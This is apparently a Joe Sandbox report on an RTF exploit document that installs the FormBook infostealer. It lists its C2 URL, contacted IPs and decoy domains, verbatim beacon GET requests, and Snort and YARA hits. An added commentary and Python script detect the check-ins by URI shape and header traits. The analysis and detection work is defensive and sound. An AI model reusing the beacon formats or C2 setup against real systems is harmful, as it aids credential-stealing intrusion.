Source: C:\Windows\explorer.exe | Domain query: www.best-boy.net
Source: C:\Windows\explorer.exe | Network Connect: 104.167.67.175 80
Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.170 80
Source: C:\Windows\explorer.exe | Domain query: www.thegoldencamel.online
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
Source: Malware configuration extractor | URLs: www.lundadonate.xyz/nb30/
Source: global traffic | HTTP traffic detected: GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1 | Host: www.thegoldencamel.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1 | Host: www.best-boy.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: Joe Sandbox View | ASN Name: ESITEDUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
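The three ET rules fire on the shape of the request rather than on the destination, and the configuration extracted above shows why that is the right design: the sample carries one real C2 (www.lundadonate.xyz/nb30/) and 64 decoy domains, and the two hosts it actually contacted here (www.thegoldencamel.online, www.best-boy.net) are both decoys, so a hostname blocklist built from this run would block nothing that matters. What the two GETs share is the URI layout (a short path, one long base64-looking parameter, one short parameter), the absence of a User-Agent header and Connection: close. The Python below is an added example, not part of the report or of the Emerging Threats rules: it parses raw HTTP requests, scores those indicators and cross-checks the Host and path against the extracted configuration. The two malicious requests are copied verbatim from the lines above; the browser request, the decoy subset, the reason strings and the URI regex (which encodes this build's layout and will drift with the next FormBook version) are my assumptions.

```python
import re

# Constructed captures: the two GETs the sandbox logged above (copied
# verbatim) plus an ordinary browser request for contrast.
REQUESTS = [
    "GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1\r\n"
    "Host: www.thegoldencamel.online\r\nConnection: close\r\n\r\n",
    "GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1\r\n"
    "Host: www.best-boy.net\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]

# Subset of the configuration the extractor recovered from memory (see above).
CONFIG = {
    "C2 list": ["www.lundadonate.xyz/nb30/"],
    "decoy": ["p5w.top", "best-boy.net", "thegoldencamel.online", "rccl.tech"],
}

# /<short path>/?<key>=<base64 blob>&<key>=<short id>: the layout of both check-ins above.
# Assumed pattern; the parameter names and lengths are specific to this build.
CHECKIN_RE = re.compile(
    r"^/([a-z0-9]{2,8})/\?[A-Za-z0-9]{2,10}=[A-Za-z0-9+/]{20,}={0,2}&[A-Za-z0-9]{2,10}=[A-Za-z0-9]{4,8}$"
)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, lower-cased header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, target, headers


def c2_paths(config):
    """'/nb30/' from 'www.lundadonate.xyz/nb30/': the host part is discarded."""
    return {"/" + url.split("/", 1)[1] for url in config["C2 list"] if "/" in url}


def classify(raw, config):
    """Return the list of indicators a request triggers (empty for clean traffic)."""
    method, target, headers = parse_request(raw)
    reasons = []
    if method == "GET" and "user-agent" not in headers:
        reasons.append("no User-Agent")
    if headers.get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    m = CHECKIN_RE.match(target)
    if m:
        reasons.append("FormBook-style URI")
        # Decoys and the real C2 share the same path; the path is the stable part.
        if "/" + m.group(1) + "/" in c2_paths(config):
            reasons.append("URI path matches extracted C2 path")
    host = headers.get("host", "").lower()
    bare = host[4:] if host.startswith("www.") else host
    if bare in config["decoy"]:
        reasons.append("Host is a configured decoy domain")
    return reasons


def is_checkin(raw, config):
    """Alert only on the structural indicators, never on the hostname alone."""
    r = classify(raw, config)
    return "FormBook-style URI" in r and "no User-Agent" in r


if __name__ == "__main__":
    for raw in REQUESTS:
        print(is_checkin(raw, CONFIG), classify(raw, CONFIG))
```

The decoy and C2-path checks are only useful after a configuration has been extracted, so they belong in a post-incident enrichment step rather than in the wire rule; the structural checks are what a Snort or Suricata rule can express, which is why all three SIDs above hit both flows regardless of the Host header.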
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: Client.exe, 00000006.00000002.951081960.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000A.00000000.973857047.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000A.00000000.979092097.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 0000000A.00000000.996446358.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011537608.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995286555.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996486805.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980535513.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerp
          Source: explorer.exe, 0000000A.00000000.1004860034.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.988141924.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1007082449.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.991189675.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1032583619.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5E27A50A-FBC0-4F18-B35D-48F0F2347081}.tmp
          Source: unknownDNS traffic detected: queries for: www.thegoldencamel.online
          Source: global trafficHTTP traffic detected: GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1Host: www.thegoldencamel.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1Host: www.best-boy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 16:39:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.thegoldencamel.online/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingX-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: MISSServer: cloudflareCF-RAY: 7379b09ee927997b-FRAData Raw: 31 36 61 33 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f 6e 6c 69 6e 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud

          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.drStream path '_1721489047/\x1Ole10Native' : ....Client.exe.C:\Path\Client.exe.........C:\Path\
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
